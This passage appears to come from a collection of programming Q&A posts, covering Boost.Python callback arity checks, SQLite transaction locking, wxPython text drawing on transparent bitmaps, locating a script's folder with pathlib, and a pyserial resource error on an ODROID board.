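        # code reads them as arg_spec[0], arg_spec[1] and arg_spec[3].
        print(inspect.getargspec(fn))
    demo(lambda x, y=2: 42)
    # True
    # ArgSpec(args=['x', 'y'], varargs=None, keywords=None, defaults=(2,))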
* * *
Here is a complete example [demonstrating](http://coliru.stacked-crooked.com/a/f8d5f23154e3e745) the usage:
#include <boost/python.hpp>
#include <sstream>
/// @brief Given a Python object `fn` and an arity of `n`, requires
    ///        that the expression `fn(a_1, ..., a_n)` be valid.
    ///        Raises TypeError if `fn` is not callable and ValueError
    ///        if `fn` is callable but has the wrong arity.
void require_arity(
std::string name,
boost::python::object fn,
std::size_t arity)
{
namespace python = boost::python;
std::stringstream error_msg;
error_msg << name << "() must take exactly " << arity << " arguments";
// Throw if the callback is not callable.
if (!PyCallable_Check(fn.ptr()))
{
PyErr_SetString(PyExc_TypeError, error_msg.str().c_str());
python::throw_error_already_set();
}
// Use the inspect module to extract the arg spec.
// >>> import inspect
auto inspect = python::import("inspect");
// >>> args, varargs, keywords, defaults = inspect.getargspec(fn)
auto arg_spec = inspect.attr("getargspec")(fn);
python::object args = arg_spec[0];
python::object varargs = arg_spec[1];
python::object defaults = arg_spec[3];
// Calculate the number of required arguments.
auto args_count = args ? python::len(args) : 0;
auto defaults_count = defaults ? python::len(defaults) : 0;
// If the function is a bound method or a class method, then the
// first argument (`self` or `cls`) will be implicitly provided.
// >>> has_self = inspect.ismethod(fn) and fn.__self__ is not None
if (static_cast<bool>(inspect.attr("ismethod")(fn))
&& fn.attr("__self__"))
{
--args_count;
}
// Require at least one argument. The function should support
// any of the following specs:
// >>> fn(a1)
// >>> fn(a1, a2=42)
// >>> fn(a1=42)
// >>> fn(*args)
auto required_count = args_count - defaults_count;
if (!( (required_count == 1) // fn(a1), fn(a1, a2=42)
|| (args_count > 0 && required_count == 0) // fn(a1=42)
|| (varargs) // fn(*args)
))
{
PyErr_SetString(PyExc_ValueError, error_msg.str().c_str());
python::throw_error_already_set();
}
}
void perform(
boost::python::object callback,
boost::python::object arg1)
{
require_arity("callback", callback, 1);
callback(arg1);
}
BOOST_PYTHON_MODULE(example)
{
namespace python = boost::python;
python::def("perform", &perform);
}
Interactive usage:
>>> import example
>>> def test(fn, a1, expect=None):
... try:
... example.perform(fn, a1)
... assert(expect is None)
... except Exception as e:
... assert(isinstance(e, expect))
...
>>> test(lambda x: 42, None)
>>> test(lambda x, y=2: 42, None)
>>> test(lambda x=1, y=2: 42, None)
>>> test(lambda *args: None, None)
>>> test(lambda: 42, None, ValueError)
>>> test(lambda x, y: 42, None, ValueError)
>>>
>>> class Mock:
... def method_no_arg(self): pass
... def method_with_arg(self, x): pass
... def method_default_arg(self, x=1): pass
... @classmethod
... def cls_no_arg(cls): pass
... @classmethod
... def cls_with_arg(cls, x): pass
... @classmethod
... def cls_with_default_arg(cls, x=1): pass
...
>>> mock = Mock()
>>> test(Mock.method_no_arg, mock)
>>> test(mock.method_no_arg, mock, ValueError)
>>> test(Mock.method_with_arg, mock, ValueError)
>>> test(mock.method_with_arg, mock)
>>> test(Mock.method_default_arg, mock)
>>> test(mock.method_default_arg, mock)
>>> test(Mock.cls_no_arg, mock, ValueError)
>>> test(mock.cls_no_arg, mock, ValueError)
>>> test(Mock.cls_with_arg, mock)
>>> test(mock.cls_with_arg, mock)
>>> test(Mock.cls_with_default_arg, mock)
>>> test(mock.cls_with_default_arg, mock)
Strict checking of function types can be argued to be non-Pythonic, and it can
become complicated because of the various kinds of callables (bound method,
unbound method, classmethod, plain function, etc.). Before applying strict type
checking, it may be worth assessing whether it is required at all, or whether
alternative checks, such as [Abstract Base
Classes](https://www.python.org/dev/peps/pep-3119/), would be sufficient. For
instance, if the `callback` functor will be invoked from a Python thread, it
may be better to skip the type check and simply let the Python exception be
raised when the callback is invoked. On the other hand, if the `callback`
functor will be invoked from a non-Python thread, checking the type in the
initiating function lets you throw the exception in the calling Python thread
instead.
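As a rough pure-Python comparison, `inspect.signature()` (Python 3.3+) can
express a similar arity check far more compactly; this is a sketch under that
assumption, not part of the Boost.Python answer above:
    import inspect
    def require_arity(name, fn, arity):
        error_msg = "%s() must take exactly %d arguments" % (name, arity)
        if not callable(fn):               # counterpart of PyCallable_Check()
            raise TypeError(error_msg)
        try:
            # bind() performs the same argument matching a real call would,
            # without actually invoking fn.
            inspect.signature(fn).bind(*range(arity))
        except TypeError:
            raise ValueError(error_msg)
    require_arity("callback", lambda x, y=2: 42, 1)  # passes
    require_arity("callback", lambda x, y: 42, 1)    # raises ValueError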
|
SQLite database gets locked by SELECT clause
Question: I have a Python script which creates a database and then enters an infinite
loop that runs once per second, querying the database with some SELECTs.
At the same time I connect to the database with the sqlite CLI and try to make
an UPDATE, but I get a `database is locked` error.
Here is the (anonymized) code of the script:
import sqlite3
import time
con = sqlite3.connect(r'path\to\database.sqlite')
con.execute('DROP TABLE IF EXISTS blah;')
con.execute('CREATE TABLE blah;')
con.execute('INSERT INTO blah;')
con.commit()
while True:
result = con.execute('SELECT blah')
print(result.fetchone()[0])
time.sleep(1)
Answer: Python's `sqlite3` module tries to be clever and [manages transactions
for you](https://docs.python.org/2/library/sqlite3.html#sqlite3-controlling-transactions).
To make sure the database stays accessible from other threads/processes,
disable that behaviour (set `isolation_level` to `None`) and use explicit
transactions when you need them. Alternatively, call `con.commit()` whenever
you are finished with a batch of statements.
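A minimal sketch of the suggested change applied to the question's script (the
`blah` statements are the question's own placeholders):
    import sqlite3
    import time
    # isolation_level=None puts the connection in autocommit mode, so the
    # sqlite3 module no longer manages transactions behind your back.
    con = sqlite3.connect(r'path\to\database.sqlite', isolation_level=None)
    while True:
        result = con.execute('SELECT blah')  # placeholder query from the question
        print(result.fetchone()[0])
        time.sleep(1)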
|
wx.SetTextForeground doesn't set DC color properly in wxPython
Question: I have the following code and I'm trying to change the text color of a DC. I
have searched the internet and found that `SetTextForeground()` should be used
for this, but somehow I'm unable to make it work.
import wx
class GUI():
def __init__(self):
self.InitUI()
def InitUI(self):
self.window = wx.Frame(None, wx.ID_ANY, "Example Title")
textList = ['text1', 'text2']
for i in range(len(textList)):
bmp = wx.Image('images/step_background.png').Rescale(160, 40).ConvertToBitmap()
bmp = self.drawTextOverBitmap(bmp, textList[i])
control = wx.StaticBitmap(self.window, -1, bmp, (0, 30*i+20), size=(160,30))
self.window.Show()
def drawTextOverBitmap(self, bitmap, text='', color=(0, 0, 0)):
dc = wx.MemoryDC(bitmap)
dc.SetTextForeground(color)
w,h = dc.GetSize()
tw, th = dc.GetTextExtent(text)
dc.DrawText(text, (w - tw) / 2, (h - th) / 2) #display text in center
return bitmap
if __name__ == '__main__':
app = wx.App()
gui = GUI()
app.MainLoop()
Do you have any idea what I am doing wrong? I would be grateful for any hints.
Thank you
Answer: You are right, transparency is the issue here. I tried your code on a non-
transparent image and it works fine, displaying the color you set.
Quoting from the [official
docs](http://docs.wxwidgets.org/trunk/classwx_d_c.html):
> In general wxDC methods don't support alpha transparency and the alpha
> component of wxColour is simply ignored and you need to use
> wxGraphicsContext for full transparency support.
So try creating a graphics context like:
dc = wx.MemoryDC(bmp)
gc = wx.GraphicsContext.Create(dc)
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
gc.SetFont(font, "Red")
w,h = dc.GetSize()
tw, th = dc.GetTextExtent(textList[i])
gc.DrawText(textList[i], (w - tw) / 2, (h - th) / 2)
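Putting that together, here is a sketch of the question's `drawTextOverBitmap()`
rewritten as a standalone helper; the function name, colour name and default
font are just illustrative choices:
    import wx
    def draw_text_over_bitmap(bitmap, text='', colour='Red'):
        dc = wx.MemoryDC(bitmap)            # the bitmap is selected into the DC
        gc = wx.GraphicsContext.Create(dc)  # the GC honours alpha transparency
        font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
        gc.SetFont(font, colour)
        w, h = dc.GetSize()
        tw, th = dc.GetTextExtent(text)
        gc.DrawText(text, (w - tw) / 2, (h - th) / 2)  # centre the text
        dc.SelectObject(wx.NullBitmap)      # detach so the bitmap can be reused
        return bitmap
The loop in `InitUI` could then call `draw_text_over_bitmap(bmp, textList[i], 'Red')`
in place of the original method.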
|
How to get the path of the folder containing the executed script
Question: I want to get the path to the folder containing my script, so that it works
from any machine without hardcoding an absolute path. So far I have the
following:
import os
path_to_folder = os.path.realpath('.')
When I run my script from `PyCharm`, calling `print(path_to_folder)` returns
the correct path
`C:\Users\Me\Desktop\Project\Script\`
But if I call it from `cmd` with `python3.4 C:\Users\Me\Desktop\Project\Script\my_script.py`
I get just
`C:\Users\Me\`
What is a more reliable way to get this path?
Answer: I would use [pathlib](https://docs.python.org/3/library/pathlib.html) and build
paths relative to `__file__`, which points at the script itself, rather than
relying on the current working directory (which is what `os.path.realpath('.')`
returns, and why you get `C:\Users\Me\` when running from `cmd`):
    from pathlib import Path
    # get a sibling file (same_level_file is a placeholder name)
    sib = Path(__file__).with_name(same_level_file)
    # get the folder containing the script
    par = Path(__file__).parent
    # file2 inside a folder that is a sibling of the script's folder
    sib2 = Path(__file__).parent.with_name(parent_folder).joinpath(file2)
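If all you need is the folder that contains the running script (which is what
the question is really after), a minimal sketch, assuming Python 3.4+:
    from pathlib import Path
    # resolve() makes the path absolute, so this works regardless of the
    # directory the script was launched from
    script_dir = Path(__file__).resolve().parent
    print(script_dir)  # e.g. C:\Users\Me\Desktop\Project\Script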
|
python-serial OSError: [Errno 11] Resource temporarily unavailable
Question: I am using an Arduino Nano to communicate over serial with an ODROID (a single-board
computer running Ubuntu 14.04). The Arduino code:
void setup() {
Serial.begin(9600); // set the baud rate
Serial.println("Ready"); // print "Ready" once
}
void loop() {
char inByte = ' ';
if(Serial.available()){ // only send data back if data has been sent
char inByte = Serial.read(); // read the incoming data
Serial.println(inByte);
}
delay(100); // delay for 1/10 of a second
}
The Python code on the ODROID:
#!/usr/bin/env python
from time import sleep
import serial
ser = serial.Serial('/dev/LIDAR', 9600, timeout=1) # Establish the connection on a specific port
sleep(1)
print "Arduino is initialized"
counter = 32 # Below 32 everything in ASCII is gibberish
while True:
if (ser.inWaiting()>0):
counter +=1
ser.write(str(chr(counter))) # Convert the decimal number to ASCII then send it to the Arduino
print ser.readline() # Read the newest output from the Arduino
sleep(.1) # Delay for one tenth of a second
if counter == 255:
counter = 32
ser.close
The traceback:
    Traceback (most recent call last):
      File "./serial_test1.py", line 16, in <module>
        print ser.readline() # Read the newest output from the Arduino
      File "/usr/lib/python2.7/dist-packages/serial/serialposix.py", line 43, in read
        buf = os.read(self.fd, size-len(read))
    OSError: [Errno 11] Resource temporarily unavailable
I get this error after a few values have been printed. I suspect the problem is
that no data is available at that moment, but how can I fix it? Thanks for your
help.
Answer: I don't know if this will work for the ODROID, but I found a post about a
[similar problem with the Raspberry
Pi](https://www.raspberrypi.org/forums/viewtopic.php?t=42931&p=346024). In
that post one of the answers [redirected to this
link](http://www.hobbytronics.co.uk/raspberry-pi-serial-port).
There it says the problem is caused by the Raspberry Pi's serial port, which is
used by default for the system console; that conflicts with using the port for
your own purposes.
To disable the console on the serial port, edit the file `/etc/inittab` and
comment out the line `T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100` (you
comment it out with a `#` at the beginning of the line, just like in Python).
Then reboot the ODROID and it should work.
I suggest you read the linked answer, because it explains a bit more about how
you can still reach the command line after giving up the serial port (it
suggests using ssh). It also explains that the Raspberry Pi (and I assume the
ODROID behaves similarly) sends a message through the serial port at boot time,
which will be received by the Arduino, and how to remove that message.
Hope this helps you
|